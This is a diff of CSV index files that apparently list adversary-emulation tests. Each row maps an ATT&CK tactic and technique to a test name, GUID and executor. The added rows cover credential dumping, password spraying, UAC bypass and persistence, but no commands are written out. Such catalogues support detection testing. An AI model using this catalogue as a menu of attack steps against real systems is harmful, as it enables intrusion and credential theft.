 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
+persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
@@ -534,6 +558,8 @@ persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a
 persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
 persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
 persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
+persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
 persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
@@ -558,6 +584,7 @@ persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364
 persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
 persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
 persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+persistence,T1543.002,Systemd Service,2,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
 persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
@@ -580,6 +607,7 @@ impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce08
 impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
 impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
 impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
+impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
 impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
 impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
 impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -618,6 +646,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,
 discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
+discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -780,6 +809,7 @@ execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8
 execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
 execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
+execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 execution,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
 execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
@@ -807,6 +837,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-3
 lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
 lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
 lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
+lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
 lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
 lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
@@ -828,6 +859,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download
 command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -840,6 +872,7 @@ command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Tes
 command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
 command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
+command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
 command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
 command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
@@ -4,12 +4,18 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
+credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
+credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
+credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
+credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
 credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
+credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
 collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
@@ -32,6 +38,8 @@ privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injecti
 privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
 privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
+privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
 privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
 privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
@@ -39,6 +47,7 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-
 privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
 privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
 privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
@@ -84,6 +93,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
@@ -143,10 +153,15 @@ discovery,T1082,System Information Discovery,11,Environment variables discovery
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
 discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
+persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
+persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
+persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
 persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
+persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
@@ -157,8 +172,11 @@ persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD
 persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
 persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
 persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
+persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
 persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+persistence,T1543.002,Systemd Service,2,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
 persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
@@ -169,6 +187,7 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83
 command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
 command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
 command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
+command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
 command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
@@ -1,7 +1,9 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
+credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
 credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
+credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
 credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
@@ -73,6 +75,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
 defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
@@ -156,6 +159,7 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83
 command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
 command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
 command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
+command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
@@ -3,13 +3,15 @@ credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
 credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
+credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
+credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
 credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
 credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
 credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
 credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
-credential-access,T1003.006,DCSync,1,DCSync,129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
+credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
 credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
-credential-access,T1558.001,Golden Ticket,1,Crafting golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
+credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
 credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
 credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
 credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
@@ -37,13 +39,14 @@ credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt
 credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
+credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
 credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
 credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
-credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
-credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
+credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
+credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
 credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
 credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
-credential-access,T1110.003,Password Spraying,3,Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
+credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
@@ -85,6 +88,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co
 privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
 privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -151,6 +155,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute
 defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
